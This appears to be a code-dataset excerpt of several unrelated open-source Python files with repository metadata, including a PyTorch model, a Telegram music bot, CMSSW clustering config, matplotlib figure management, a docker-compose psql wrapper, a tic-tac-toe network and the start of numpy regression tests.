self.fc1 = nn.Linear(in_features=1024, out_features=256)
self.fc2 = nn.Linear(in_features=256, out_features=64)
self.fc3 = nn.Linear(in_features=64, out_features=10)
def forward(self, data):
data = self.conv1(data)
data = F.leaky_relu(data)
data = F.max_pool2d(data, 2)
data = self.dropout1(data)
data = self.conv2(data)
data = F.leaky_relu(data)
data = F.max_pool2d(data, 2)
data = self.dropout2(data)
data = torch.flatten(data, start_dim=1)
data = self.fc1(data)
data = F.leaky_relu(data)
data = self.fc2(data)
data = F.leaky_relu(data)
output = self.fc3(data)
return output
| 27.928571
| 88
| 0.623188
|
3712690d22ea0e83e6f520e9058571758115cc9b
| 392
|
py
|
Python
|
ch5/performances.map.py
|
ldmcdaniel/learning_python
|
63717c397cd75e45a8aef909d4b601466cd6036a
|
[
"MIT"
] | 55
|
2018-07-04T10:12:15.000Z
|
2022-03-03T19:51:54.000Z
|
ch5/performances.map.py
|
ldmcdaniel/learning_python
|
63717c397cd75e45a8aef909d4b601466cd6036a
|
[
"MIT"
] | 6
|
2020-03-24T16:37:46.000Z
|
2021-06-10T21:04:36.000Z
|
ch5/performances.map.py
|
ldmcdaniel/learning_python
|
63717c397cd75e45a8aef909d4b601466cd6036a
|
[
"MIT"
] | 32
|
2018-07-10T05:56:31.000Z
|
2021-09-04T23:19:42.000Z
|
from time import time
mx = 2 * 10 ** 7
t = time()
absloop = []
for n in range(mx):
absloop.append(abs(n))
print('for loop: {:.4f} s'.format(time() - t))
t = time()
abslist = [abs(n) for n in range(mx)]
print('list comprehension: {:.4f} s'.format(time() - t))
t = time()
absmap = list(map(abs, range(mx)))
print('map: {:.4f} s'.format(time() - t))
print(absloop == abslist == absmap)
| 19.6
| 56
| 0.591837
|
e9b5f8aa339d2447e0117ff126fda2edac2758fe
| 1,841
|
py
|
Python
|
AlexaSongBot/__main__.py
|
victorsilva0292/trTt2Ls
|
9f8edbee0ffd533b3063a2ad602e226059563b08
|
[
"MIT"
] | null | null | null |
AlexaSongBot/__main__.py
|
victorsilva0292/trTt2Ls
|
9f8edbee0ffd533b3063a2ad602e226059563b08
|
[
"MIT"
] | null | null | null |
AlexaSongBot/__main__.py
|
victorsilva0292/trTt2Ls
|
9f8edbee0ffd533b3063a2ad602e226059563b08
|
[
"MIT"
] | null | null | null |
# © @Mr_Dark_Prince
from config import OWNER_ID
from pyrogram.types.bots_and_keyboards import reply_keyboard_markup
from AlexaSongBot.modules import *
from pyrogram import idle, filters
from pyrogram.types import InlineKeyboardMarkup
from pyrogram.types import InlineKeyboardButton
from AlexaSongBot import app, LOGGER
from AlexaSongBot.mrdarkprince import ignore_blacklisted_users
from AlexaSongBot.sql.chat_sql import add_chat_to_db
start_text = """
Olá [{}](tg://user?id={}),
Sou o 𝙏𝙍𝙎𝙤𝙣𝙜 👌😳
Para fazer um download Basta me enviar o nome da música que você deseja baixar.
Por exemplo: ```/msc Teto - Dia Azul```
"""
owner_help = """
/blacklist user_id
/unblacklist user_id
/broadcast message to send
/eval python code
/chatlist get list of all chats
"""
@app.on_message(filters.create(ignore_blacklisted_users) & filters.command("start"))
async def start(client, message):
chat_id = message.chat.id
user_id = message.from_user["id"]
name = message.from_user["first_name"]
if message.chat.type == "private":
btn = InlineKeyboardMarkup(
[
[
InlineKeyboardButton(
text="MEU CANAL", url="https://www.youtube.com/watch?v=3lUDyq2MfEo&list=RDDsdjqBfTpaI&index=4"
)
]
]
)
else:
btn = None
await message.reply(start_text.format(name, user_id), reply_markup=btn)
add_chat_to_db(str(chat_id))
@app.on_message(filters.create(ignore_blacklisted_users) & filters.command("vi32"))
async def help(client, message):
if message.from_user["id"] in OWNER_ID:
await message.reply(owner_help)
return ""
text = "Syntax: /msc nome da música"
await message.reply(text)
OWNER_ID.append(1587091205)
app.start()
LOGGER.info("Your bot is now online.")
idle()
| 29.693548
| 118
| 0.692015
|
c65c1f244360f9fede69c442aa616805d4baeebf
| 6,977
|
py
|
Python
|
L1Trigger/L1THGCalUtilities/python/clustering3d.py
|
eric-moreno/cmssw
|
3dc2c26f276632ac8357ac7b52675f04649e3903
|
[
"Apache-2.0"
] | 3
|
2018-08-24T19:10:26.000Z
|
2019-02-19T11:45:32.000Z
|
L1Trigger/L1THGCalUtilities/python/clustering3d.py
|
eric-moreno/cmssw
|
3dc2c26f276632ac8357ac7b52675f04649e3903
|
[
"Apache-2.0"
] | 3
|
2018-08-23T13:40:24.000Z
|
2019-12-05T21:16:03.000Z
|
L1Trigger/L1THGCalUtilities/python/clustering3d.py
|
eric-moreno/cmssw
|
3dc2c26f276632ac8357ac7b52675f04649e3903
|
[
"Apache-2.0"
] | 5
|
2018-08-21T16:37:52.000Z
|
2020-01-09T13:33:17.000Z
|
import FWCore.ParameterSet.Config as cms
from L1Trigger.L1THGCal.hgcalBackEndLayer2Producer_cfi import distance_C3d_params, \
dbscan_C3d_params, \
histoMax_C3d_params, \
histoMaxVariableDR_C3d_params, \
histoSecondaryMax_C3d_params, \
histoInterpolatedMax_C3d_params, \
histoThreshold_C3d_params, \
neighbour_weights_1stOrder, \
neighbour_weights_2ndOrder
from L1Trigger.L1THGCal.customClustering import set_histomax_params
def create_distance(process, inputs,
distance=distance_C3d_params.dR_multicluster
):
producer = process.hgcalBackEndLayer2Producer.clone(
InputCluster = cms.InputTag('{}:HGCalBackendLayer1Processor2DClustering'.format(inputs))
)
producer.ProcessorParameters.C3d_parameters = distance_C3d_params.clone(
dR_multicluster = distance
)
return producer
def create_dbscan(process, inputs,
distance=dbscan_C3d_params.dist_dbscan_multicluster,
min_points=dbscan_C3d_params.minN_dbscan_multicluster
):
producer = process.hgcalBackEndLayer2Producer.clone(
InputCluster = cms.InputTag('{}:HGCalBackendLayer1Processor2DClustering'.format(inputs))
)
producer.ProcessorParameters.C3d_parameters = dbscan_C3d_params.clone(
dist_dbscan_multicluster = distance,
minN_dbscan_multicluster = min_points
)
return producer
def create_histoMax(process, inputs,
distance=histoMax_C3d_params.dR_multicluster,
nBins_R=histoMax_C3d_params.nBins_R_histo_multicluster,
nBins_Phi=histoMax_C3d_params.nBins_Phi_histo_multicluster,
binSumsHisto=histoMax_C3d_params.binSumsHisto,
seed_threshold=histoMax_C3d_params.threshold_histo_multicluster,
):
producer = process.hgcalBackEndLayer2Producer.clone(
InputCluster = cms.InputTag('{}:HGCalBackendLayer1Processor2DClustering'.format(inputs))
)
producer.ProcessorParameters.C3d_parameters = histoMax_C3d_params.clone()
set_histomax_params(producer.ProcessorParameters.C3d_parameters, distance, nBins_R, nBins_Phi, binSumsHisto, seed_threshold)
return producer
def create_histoMax_variableDr(process, inputs,
distances=histoMaxVariableDR_C3d_params.dR_multicluster_byLayer_coefficientA,
nBins_R=histoMaxVariableDR_C3d_params.nBins_R_histo_multicluster,
nBins_Phi=histoMaxVariableDR_C3d_params.nBins_Phi_histo_multicluster,
binSumsHisto=histoMaxVariableDR_C3d_params.binSumsHisto,
seed_threshold=histoMaxVariableDR_C3d_params.threshold_histo_multicluster,
):
producer = process.hgcalBackEndLayer2Producer.clone(
InputCluster = cms.InputTag('{}:HGCalBackendLayer1Processor2DClustering'.format(inputs))
)
producer.ProcessorParameters.C3d_parameters = histoMax_C3d_params.clone(
dR_multicluster_byLayer_coefficientA = distances
)
set_histomax_params(producer.ProcessorParameters.C3d_parameters, 0, nBins_R, nBins_Phi, binSumsHisto, seed_threshold)
return producer
def create_histoInterpolatedMax1stOrder(process, inputs,
distance=histoInterpolatedMax_C3d_params.dR_multicluster,
nBins_R=histoInterpolatedMax_C3d_params.nBins_R_histo_multicluster,
nBins_Phi=histoInterpolatedMax_C3d_params.nBins_Phi_histo_multicluster,
binSumsHisto=histoInterpolatedMax_C3d_params.binSumsHisto,
seed_threshold=histoInterpolatedMax_C3d_params.threshold_histo_multicluster,
):
producer = process.hgcalBackEndLayer2Producer.clone(
InputCluster = cms.InputTag('{}:HGCalBackendLayer1Processor2DClustering'.format(inputs))
)
producer.ProcessorParameters.C3d_parameters = histoInterpolatedMax_C3d_params.clone(
neighbour_weights = neighbour_weights_1stOrder
)
set_histomax_params(producer.ProcessorParameters.C3d_parameters, distance, nBins_R, nBins_Phi, binSumsHisto, seed_threshold)
return producer
def create_histoInterpolatedMax2ndOrder(process, inputs,
distance=histoInterpolatedMax_C3d_params.dR_multicluster,
nBins_R=histoInterpolatedMax_C3d_params.nBins_R_histo_multicluster,
nBins_Phi=histoInterpolatedMax_C3d_params.nBins_Phi_histo_multicluster,
binSumsHisto=histoInterpolatedMax_C3d_params.binSumsHisto,
seed_threshold=histoInterpolatedMax_C3d_params.threshold_histo_multicluster,
):
producer = process.hgcalBackEndLayer2Producer.clone(
InputCluster = cms.InputTag('{}:HGCalBackendLayer1Processor2DClustering'.format(inputs))
)
producer.ProcessorParameters.C3d_parameters = histoInterpolatedMax_C3d_params.clone(
neighbour_weights = neighbour_weights_2ndOrder
)
set_histomax_params(producer.ProcessorParameters.C3d_parameters, distance, nBins_R, nBins_Phi, binSumsHisto, seed_threshold)
return producer
def create_histoThreshold(process, inputs,
threshold=histoThreshold_C3d_params.threshold_histo_multicluster,
distance=histoThreshold_C3d_params.dR_multicluster,
nBins_R=histoThreshold_C3d_params.nBins_R_histo_multicluster,
nBins_Phi=histoThreshold_C3d_params.nBins_Phi_histo_multicluster,
binSumsHisto=histoThreshold_C3d_params.binSumsHisto
):
producer = process.hgcalBackEndLayer2Producer.clone(
InputCluster = cms.InputTag('{}:HGCalBackendLayer1Processor2DClustering'.format(inputs))
)
producer.ProcessorParameters.C3d_parameters = histoThreshold_C3d_params.clone()
set_histomax_params(producer.ProcessorParameters.C3d_parameters, distance, nBins_R, nBins_Phi, binSumsHisto, threshold)
return producer
| 58.141667
| 128
| 0.638383
|
bee8dcadbb906427555777915e95f1a0a4e1debf
| 3,403
|
py
|
Python
|
editing files/Portable Python 3.2.5.1/App/Lib/site-packages/matplotlib/_pylab_helpers.py
|
mattl1598/testing
|
cd8124773b83a07301c507ffbb9ccaafbfe7a274
|
[
"Unlicense"
] | null | null | null |
editing files/Portable Python 3.2.5.1/App/Lib/site-packages/matplotlib/_pylab_helpers.py
|
mattl1598/testing
|
cd8124773b83a07301c507ffbb9ccaafbfe7a274
|
[
"Unlicense"
] | 1
|
2018-04-15T22:59:15.000Z
|
2018-04-15T22:59:15.000Z
|
editing files/Portable Python 3.2.5.1/App/Lib/site-packages/matplotlib/_pylab_helpers.py
|
mattl1598/Project-Mochachino
|
cd8124773b83a07301c507ffbb9ccaafbfe7a274
|
[
"Unlicense"
] | null | null | null |
"""
Manage figures for pyplot interface.
"""
import sys, gc
import atexit
import traceback
def error_msg(msg):
print(msg, file=sys.stderr)
class Gcf(object):
"""
Singleton to manage a set of integer-numbered figures.
This class is never instantiated; it consists of two class
attributes (a list and a dictionary), and a set of static
methods that operate on those attributes, accessing them
directly as class attributes.
Attributes:
*figs*:
dictionary of the form {*num*: *manager*, ...}
*_activeQue*:
list of *managers*, with active one at the end
"""
_activeQue = []
figs = {}
@staticmethod
def get_fig_manager(num):
"""
If figure manager *num* exists, make it the active
figure and return the manager; otherwise return *None*.
"""
manager = Gcf.figs.get(num, None)
if manager is not None:
Gcf.set_active(manager)
return manager
@staticmethod
def destroy(num):
"""
Try to remove all traces of figure *num*.
In the interactive backends, this is bound to the
window "destroy" and "delete" events.
"""
if not Gcf.has_fignum(num): return
manager = Gcf.figs[num]
manager.canvas.mpl_disconnect(manager._cidgcf)
# There must be a good reason for the following careful
# rebuilding of the activeQue; what is it?
oldQue = Gcf._activeQue[:]
Gcf._activeQue = []
for f in oldQue:
if f != manager:
Gcf._activeQue.append(f)
del Gcf.figs[num]
#print len(Gcf.figs.keys()), len(Gcf._activeQue)
manager.destroy()
gc.collect()
@staticmethod
def destroy_fig(fig):
"*fig* is a Figure instance"
num = None
for manager in Gcf.figs.values():
if manager.canvas.figure == fig:
num = manager.num
break
if num is not None:
Gcf.destroy(num)
@staticmethod
def destroy_all():
for manager in list(Gcf.figs.values()):
manager.canvas.mpl_disconnect(manager._cidgcf)
manager.destroy()
Gcf._activeQue = []
Gcf.figs.clear()
gc.collect()
@staticmethod
def has_fignum(num):
"""
Return *True* if figure *num* exists.
"""
return num in Gcf.figs
@staticmethod
def get_all_fig_managers():
"""
Return a list of figure managers.
"""
return list(Gcf.figs.values())
@staticmethod
def get_num_fig_managers():
"""
Return the number of figures being managed.
"""
return len(list(Gcf.figs.values()))
@staticmethod
def get_active():
"""
Return the manager of the active figure, or *None*.
"""
if len(Gcf._activeQue)==0:
return None
else: return Gcf._activeQue[-1]
@staticmethod
def set_active(manager):
"""
Make the figure corresponding to *manager* the active one.
"""
oldQue = Gcf._activeQue[:]
Gcf._activeQue = []
for m in oldQue:
if m != manager: Gcf._activeQue.append(m)
Gcf._activeQue.append(manager)
Gcf.figs[manager.num] = manager
atexit.register(Gcf.destroy_all)
| 24.307143
| 66
| 0.57273
|
03af6247b105ea71c73924af798634c33d945649
| 258
|
py
|
Python
|
CCC/CCC_11_S2_Multiple_Choice.py
|
Togohogo1/pg
|
ee3c36acde47769c66ee13a227762ee677591375
|
[
"MIT"
] | null | null | null |
CCC/CCC_11_S2_Multiple_Choice.py
|
Togohogo1/pg
|
ee3c36acde47769c66ee13a227762ee677591375
|
[
"MIT"
] | 1
|
2021-10-14T18:26:56.000Z
|
2021-10-14T18:26:56.000Z
|
CCC/CCC_11_S2_Multiple_Choice.py
|
Togohogo1/pg
|
ee3c36acde47769c66ee13a227762ee677591375
|
[
"MIT"
] | 1
|
2021-08-06T03:39:55.000Z
|
2021-08-06T03:39:55.000Z
|
count = 0
wrong = []
correct = []
N = int(input())
for i in range(N):
ans = input()
wrong.append(ans)
for i in range(N):
ans = input()
correct.append(ans)
for i in range(N):
if wrong[i] == correct[i]:
count += 1
print(count)
| 12.9
| 30
| 0.546512
|
a3660768f17eff379c6ef4dc1b50f3637302b130
| 4,915
|
py
|
Python
|
docker_compose_postgres/__init__.py
|
d10xa/docker-compose-postgres
|
435c9933949b47968d852f9010e910517af10894
|
[
"MIT"
] | null | null | null |
docker_compose_postgres/__init__.py
|
d10xa/docker-compose-postgres
|
435c9933949b47968d852f9010e910517af10894
|
[
"MIT"
] | null | null | null |
docker_compose_postgres/__init__.py
|
d10xa/docker-compose-postgres
|
435c9933949b47968d852f9010e910517af10894
|
[
"MIT"
] | null | null | null |
__version__ = '0.0.2'
from subprocess import call, list2cmdline
import yaml
import argparse
import os
import re
REGEX_ENV_WITH_DEFAULT = re.compile(r'\${(.+):-(.+)}')
def run_postgres(
file,
command,
disable_tty,
docker_compose_command,
print_command,
env_postgres_user,
env_postgres_db,
default_user,
service,
user,
db):
with open(file, 'r') as f:
yml = yaml.safe_load(f)
service_name = service or find_postgres_service(yml)
environment = extract_environment(yml, service_name)
user = user or environment.get(env_postgres_user) or default_user
db = db or environment.get(env_postgres_db) or user
a = [docker_compose_command]
a.extend([] if file == 'docker-compose.yml' else ['-f', file])
a.append('exec')
a.extend(['-T'] if disable_tty else [])
a.append(service_name)
a.append('psql')
a.append('-U')
a.append(user)
a.append(db)
a.extend(['-c', command] if command else [])
if print_command:
print(list2cmdline(a))
else:
call(a)
def find_postgres_service(yml):
for (k, v) in yml.get('services', {}).items():
img = v.get('image')
if img.startswith('postgres:') or img == 'postgres':
return k
return None
def extract_environment(yml, service_name):
service = yml.get('services', {}).get(service_name)
if not service:
raise ValueError(
'service `{}` is not defined in docker-compose file'.format(
service_name))
environment = service.get('environment', None)
if environment:
environment = \
dict([(k, resolve_env(v)) for (k, v) in environment.items()])
if not environment:
env_file = service.get('env_file')
if isinstance(env_file, list):
environment = read_env_files(env_file)
pass
elif isinstance(env_file, str):
environment = read_env_file(env_file)
elif env_file is None:
environment = read_env_file('.env')
else:
raise ValueError('env_file bad format ' + str(env_file))
return environment
def resolve_env(value):
m = REGEX_ENV_WITH_DEFAULT.match(value)
if m:
value = os.environ.get(m[1]) or m[2]
return value
def removeprefix(s, prefix):
if s.startswith(prefix):
return s[len(prefix):]
else:
return s
def split_env_str(s):
return s.split('=', 1)
def read_env_file(path):
with open(path) as f:
lines = f.read().splitlines()
lines = [split_env_str(removeprefix(i, 'export ')) for i in lines]
return dict(lines)
def read_env_files(paths):
e = {}
for path in paths:
e.update(read_env_file(path))
return e
def main():
parser = argparse.ArgumentParser()
parser.add_argument(
'-c', '--command',
help='run only single command (SQL or internal) and exit')
parser.add_argument(
'-T', default=False, action='store_true',
help='disable pseudo-tty allocation. '
'By default `docker-compose exec allocates a TTY.')
parser.add_argument(
'--docker-compose-command',
help='path to docker-compose executable. Default `docker-compose`',
default='docker-compose')
parser.add_argument(
'-p',
'--print', dest='print_command',
help='do not call subprocess. Print command only.',
default=False, action='store_true')
parser.add_argument(
'-f', '--file',
help='specify an alternate compose file (default: docker-compose.yml)',
default='docker-compose.yml')
parser.add_argument(
'--env-user',
help='environment variable which defines username. '
'Default `POSTGRES_USER`',
default='POSTGRES_USER')
parser.add_argument(
'--env-db',
help='environment variable which defines dbname. '
'Default `POSTGRES_DB`',
default='POSTGRES_DB')
parser.add_argument(
'--service',
help='specify name of service. Default behaviour is to'
' find service with image name starts with `postgres:`'
)
parser.add_argument('-U', '--username', help='database user name')
parser.add_argument('-d', '--dbname', help='database name')
args = parser.parse_args()
run_postgres(
file=args.file,
command=args.command,
disable_tty=args.T,
docker_compose_command=args.docker_compose_command,
print_command=args.print_command,
env_postgres_user=args.env_user,
env_postgres_db=args.env_db,
default_user='postgres',
service=args.service,
user=args.username,
db=args.dbname
)
if __name__ == '__main__':
main()
| 28.74269
| 79
| 0.601831
|
52f08f8c5aaf5f9422b54a3505fb2933d8315224
| 5,349
|
py
|
Python
|
behavioral_cloning/model.py
|
bartekx43/AlphaTTT
|
a01c38833a7f841483146bebeef73323d527d812
|
[
"MIT"
] | 3
|
2021-05-23T23:55:03.000Z
|
2021-07-09T16:01:10.000Z
|
behavioral_cloning/model.py
|
bartekx43/AlphaTTT
|
a01c38833a7f841483146bebeef73323d527d812
|
[
"MIT"
] | null | null | null |
behavioral_cloning/model.py
|
bartekx43/AlphaTTT
|
a01c38833a7f841483146bebeef73323d527d812
|
[
"MIT"
] | 2
|
2021-07-09T11:44:09.000Z
|
2021-07-11T12:32:58.000Z
|
import os
import numpy as np
from copy import deepcopy
from collections import deque
import torch
from torch import nn
from torch.nn import functional as F
from torch.optim import AdamW
torch.manual_seed(80085)
np.random.seed(80085)
def softXEnt (inp, target): # temporary
logprobs = torch.log(inp)
cross_entropy = -(target * logprobs).sum() / inp.shape[0]
return cross_entropy
# TODO: try out this variant of residual blocks (diff from paper but same as behavioral_cloning) if doesn't work well
# try the regular BasicBlock (same as paper)
class IdentityBlock(nn.Module):
def __init__(self, f, filters, input_dim, use_bias=True):
super().__init__()
pad = int((f - 1)/2) # same padding
F1, F2 = filters
self.conv1 = nn.Conv2d(input_dim, F1, padding=(pad,pad), kernel_size=f, stride=1, bias=use_bias)
self.conv2 = nn.Conv2d(F1, F2, padding=(pad, pad), kernel_size=f, stride=1, bias=use_bias)
self.conv3 = nn.Conv2d(F2, F1, padding=(pad, pad), kernel_size=f, stride=1, bias=use_bias)
def forward(self, x):
shortcut = x
x = self.conv1(x)
x = F.leaky_relu(x, 0.2)
x = self.conv2(x)
x = F.leaky_relu(x, 0.2)
x = self.conv3(x)
x += shortcut
x = F.leaky_relu(x, 0.2)
return x
class ConvolutionalBlock(nn.Module):
def __init__(self, f, filters, input_dim, use_bias=True):
super().__init__()
pad = int((f - 1)/2) # same padding
F1, F2, F3 = filters
self.conv1 = nn.Conv2d(input_dim, F1, padding=(pad, pad), kernel_size=f, stride=1, bias=use_bias)
self.conv2 = nn.Conv2d(F1, F2, padding=(pad, pad), kernel_size=f, stride=1, bias=use_bias)
self.conv3 = nn.Conv2d(F2, F3, padding=(pad, pad), kernel_size=f, stride=1, bias=use_bias)
self.conv_change = nn.Conv2d(input_dim, F3, padding=(0,0), kernel_size=1, stride=1, bias=use_bias)
def forward(self, x):
shortcut = x
x = self.conv1(x)
x = F.leaky_relu(x, 0.2)
x = self.conv2(x)
x = F.leaky_relu(x, 0.2)
x = self.conv3(x)
shortcut = self.conv_change(shortcut)
x += shortcut
x = F.leaky_relu(x, 0.2)
return x
class PolicyHead(nn.Module):
def __init__(self, board_shape, use_bias):
super().__init__()
self.board_shape = board_shape
self.identity1 = IdentityBlock(3, [24, 48], 24, use_bias)
self.conv1 = nn.Conv2d(24, 1, padding=(1, 1), kernel_size=3, stride=1, bias=use_bias)
self.flatten = nn.Flatten()
def forward(self, x):
p = self.identity1(x)
p = self.conv1(p)
p = self.flatten(p)
p = F.softmax(p, dim=1)
return p
class ValueHead(nn.Module):
def __init__(self, use_bias):
super().__init__()
self.convolutional1 = ConvolutionalBlock(3, [24, 48, 1], 24, use_bias)
self.val_linear1 = nn.Linear(100, 1)
self.flatten = nn.Flatten()
def forward(self, x):
v = self.convolutional1(x)
v = self.flatten(v)
v = self.val_linear1(v)
v = torch.tanh(v)
return v
class Brain(nn.Module):
def __init__(self, input_shape=(3, 30, 30)):
super().__init__()
self.input_shape = input_shape
use_bias = True
self.conv1 = nn.Conv2d(input_shape[0], 16, padding=(2,2), kernel_size=5, stride=1, bias=use_bias)
self.convolutional1 = ConvolutionalBlock(5, [24, 48, 24], 16, use_bias)
self.identity1 = IdentityBlock(5, [24, 48], 24, use_bias)
self.policy_head = PolicyHead(input_shape, use_bias)
self.value_head = ValueHead(use_bias)
def forward(self, x):
# Core:
x = self.conv1(x)
x = F.leaky_relu(x)
x = self.convolutional1(x)
x = self.identity1(x)
p, v = self.policy_head(x), self.value_head(x)
return p, v
class ZeroTTT():
def __init__(self, brain_path=None, opt_path=None, board_len=10, lr=3e-4, weight_decay=0.0):
self.device = torch.device('cuda' if torch.cuda.is_available() else 'cpu')
self.brain = Brain(input_shape=(3, board_len, board_len)).to(self.device)
self.board_len = board_len
self.optimizer = AdamW(self.brain.parameters(), lr=lr, weight_decay=weight_decay)
self.value_loss = nn.MSELoss()
self.policy_loss = softXEnt
if brain_path is not None:
self.load_brain(brain_path, opt_path)
def get_parameter_count(self):
return sum(p.numel() for p in self.brain.parameters() if p.requires_grad)
def save_brain(self, model_name, opt_state_name):
print("Saving brain...")
torch.save(self.brain.state_dict(), os.path.join('models', model_name))
if opt_state_name is not None:
torch.save(self.optimizer.state_dict(), os.path.join('models', opt_state_name))
def load_brain(self, model_name, opt_state_name):
print("Loading brain...")
self.brain.load_state_dict(torch.load(os.path.join('models', model_name), map_location=self.device))
if opt_state_name is not None:
self.optimizer.load_state_dict(torch.load(os.path.join('models', opt_state_name), map_location=self.device))
return
def predict(self, x, interpret_output=True):
if len(x.shape) < 4:
x = np.expand_dims(x, axis=0)
x = torch.from_numpy(x).float().to(self.device)
policy, value = self.brain(x)
if interpret_output: # return 2d policy map and value in usable form
policy = policy.view(-1, self.board_len, self.board_len)
policy = policy[0].cpu().detach().numpy()
value = value[0][0].item()
return policy, value
| 31.650888
| 117
| 0.672088
|
1a3fa20a45029a1209f44b58932498dc03d8d3e7
| 677
|
py
|
Python
|
face_recognition.py
|
M-inghsin/oss-enterprise
|
0f65b71ff356e6dcd82486a1226c7fd39aa4a1af
|
[
"CC-BY-4.0"
] | null | null | null |
face_recognition.py
|
M-inghsin/oss-enterprise
|
0f65b71ff356e6dcd82486a1226c7fd39aa4a1af
|
[
"CC-BY-4.0"
] | 1
|
2020-12-09T17:37:20.000Z
|
2020-12-09T17:37:21.000Z
|
face_recognition.py
|
M-inghsin/oss-enterprise
|
0f65b71ff356e6dcd82486a1226c7fd39aa4a1af
|
[
"CC-BY-4.0"
] | null | null | null |
#!/usr/bin/python
#-*- coding: utf-8 -*-
# Library: pip3 install opencv-python
import cv2
# Load the cascade
# /Library/Frameworks/Python.framework/Versions/3.9/lib/python3.9/site-packages/cv2/data/haarcascade_frontalface_alt.xml
face_cascade = cv2.CascadeClassifier('face_detector.xml')
# Read the input image
img = cv2.imread('img_test.jpg')
# Detect faces in the image
faces = face_cascade.detectMultiScale(img, 1.1, 4)
# Draw rectangle around the faces
for (x, y, w, h) in faces:
cv2.rectangle(img, (x, y), (x+w, y+h), (255, 250, 205), 2)
# Export the result
cv2.imwrite('img_test.png', img)
print('Found {0} face(s)!'.format(len(faces)), '\nSuccessfully saved')
| 28.208333
| 120
| 0.714919
|
ebbcf514ad4e4dc88e9cba7bb13fdb54c14fdf71
| 1,676
|
py
|
Python
|
First_course/ex3_1.py
|
laetrid/learning
|
b28312c34db2118fb7d5691834b8f7e628117642
|
[
"Apache-2.0"
] | null | null | null |
First_course/ex3_1.py
|
laetrid/learning
|
b28312c34db2118fb7d5691834b8f7e628117642
|
[
"Apache-2.0"
] | null | null | null |
First_course/ex3_1.py
|
laetrid/learning
|
b28312c34db2118fb7d5691834b8f7e628117642
|
[
"Apache-2.0"
] | null | null | null |
#!/usr/bin/env python
'''
Learning Python
Class#3
I. Create an IP address converter (dotted decimal to binary). This will be
similar to what we did in class2 except:
A. Make the IP address a command-line argument instead of prompting the user
for it.
./binary_converter.py 10.88.17.23
B. Simplify the script logic by using the flow-control statements that we
learned in this class.
C. Zero-pad the digits such that the binary output is always 8-binary digits
long. Strip off the leading '0b' characters. For example,
OLD: 0b1010
NEW: 00001010
D. Print to standard output using a dotted binary format. For example,
IP address Binary
10.88.17.23 00001010.01011000.00010001.00010111
Note, you will probably need to use a 'while' loop and a 'break' statement
for part C.
while True:
...
break # on some condition (exit the while loop)
Python will execute this loop again and again until the 'break' is encountered.
'''
from sys import argv
if len(argv) != 2:
exit("\tYou should pass one argument for this script.\n\tExample: ./test3_1.py <IP address>")
ip_addr = argv[1]
formatter = "%-20s%-60s"
column1 = "IP address"
column2 = "Binary"
octets = ip_addr.split('.')
ip_addr_bin = []
if len(octets) != 4:
exit("Invalid IP address entered")
for octet in octets:
octet = bin(int(octet))
octet = octet[2:]
octet = "0" * (8 - len(octet)) + octet
ip_addr_bin.append(octet)
ip_addr_bin = '.'.join(ip_addr_bin)
print "=" * 80
print formatter % (column1, column2)
print formatter % (ip_addr, ip_addr_bin)
print "=" * 80
# The END
| 28.896552
| 95
| 0.665871
|
7118af8c382513632fb098b4eb6fcffede74c371
| 68,558
|
py
|
Python
|
numpy/core/tests/test_regression.py
|
mdboom/numpy
|
7ae0206c4b5685a3b0abd1865850e0c92aeb7389
|
[
"BSD-3-Clause"
] | 3
|
2015-06-25T20:50:18.000Z
|
2021-06-11T22:09:02.000Z
|
numpy/core/tests/test_regression.py
|
mdboom/numpy
|
7ae0206c4b5685a3b0abd1865850e0c92aeb7389
|
[
"BSD-3-Clause"
] | null | null | null |
numpy/core/tests/test_regression.py
|
mdboom/numpy
|
7ae0206c4b5685a3b0abd1865850e0c92aeb7389
|
[
"BSD-3-Clause"
] | null | null | null |
from __future__ import division, absolute_import, print_function
import pickle
import sys
import platform
import gc
import copy
import warnings
import tempfile
from os import path
from io import BytesIO
import numpy as np
from numpy.testing import (
run_module_suite, TestCase, assert_, assert_equal,
assert_almost_equal, assert_array_equal, assert_array_almost_equal,
assert_raises, assert_warns, dec
)
from numpy.testing.utils import _assert_valid_refcount
from numpy.compat import asbytes, asunicode, asbytes_nested, long, sixu
rlevel = 1
class TestRegression(TestCase):
def test_invalid_round(self,level=rlevel):
"""Ticket #3"""
v = 4.7599999999999998
assert_array_equal(np.array([v]), np.array(v))
def test_mem_empty(self,level=rlevel):
"""Ticket #7"""
np.empty((1,), dtype=[('x', np.int64)])
def test_pickle_transposed(self,level=rlevel):
"""Ticket #16"""
a = np.transpose(np.array([[2, 9], [7, 0], [3, 8]]))
f = BytesIO()
pickle.dump(a, f)
f.seek(0)
b = pickle.load(f)
f.close()
assert_array_equal(a, b)
def test_typeNA(self,level=rlevel):
"""Ticket #31"""
assert_equal(np.typeNA[np.int64], 'Int64')
assert_equal(np.typeNA[np.uint64], 'UInt64')
def test_dtype_names(self,level=rlevel):
"""Ticket #35"""
dt = np.dtype([(('name', 'label'), np.int32, 3)])
def test_reduce(self,level=rlevel):
"""Ticket #40"""
assert_almost_equal(np.add.reduce([1., .5], dtype=None), 1.5)
def test_zeros_order(self,level=rlevel):
"""Ticket #43"""
np.zeros([3], int, 'C')
np.zeros([3], order='C')
np.zeros([3], int, order='C')
def test_asarray_with_order(self,level=rlevel):
"""Check that nothing is done when order='F' and array C/F-contiguous"""
a = np.ones(2)
assert_(a is np.asarray(a, order='F'))
def test_ravel_with_order(self,level=rlevel):
"""Check that ravel works when order='F' and array C/F-contiguous"""
a = np.ones(2)
assert_(not a.ravel('F').flags.owndata)
def test_sort_bigendian(self,level=rlevel):
"""Ticket #47"""
a = np.linspace(0, 10, 11)
c = a.astype(np.dtype('<f8'))
c.sort()
assert_array_almost_equal(c, a)
def test_negative_nd_indexing(self,level=rlevel):
"""Ticket #49"""
c = np.arange(125).reshape((5, 5, 5))
origidx = np.array([-1, 0, 1])
idx = np.array(origidx)
c[idx]
assert_array_equal(idx, origidx)
def test_char_dump(self,level=rlevel):
"""Ticket #50"""
f = BytesIO()
ca = np.char.array(np.arange(1000, 1010), itemsize=4)
ca.dump(f)
f.seek(0)
ca = np.load(f)
f.close()
def test_noncontiguous_fill(self,level=rlevel):
"""Ticket #58."""
a = np.zeros((5, 3))
b = a[:, :2,]
def rs():
b.shape = (10,)
self.assertRaises(AttributeError, rs)
def test_bool(self,level=rlevel):
"""Ticket #60"""
x = np.bool_(1)
def test_indexing1(self,level=rlevel):
"""Ticket #64"""
descr = [('x', [('y', [('z', 'c16', (2,)),]),]),]
buffer = ((([6j, 4j],),),)
h = np.array(buffer, dtype=descr)
h['x']['y']['z']
def test_indexing2(self,level=rlevel):
"""Ticket #65"""
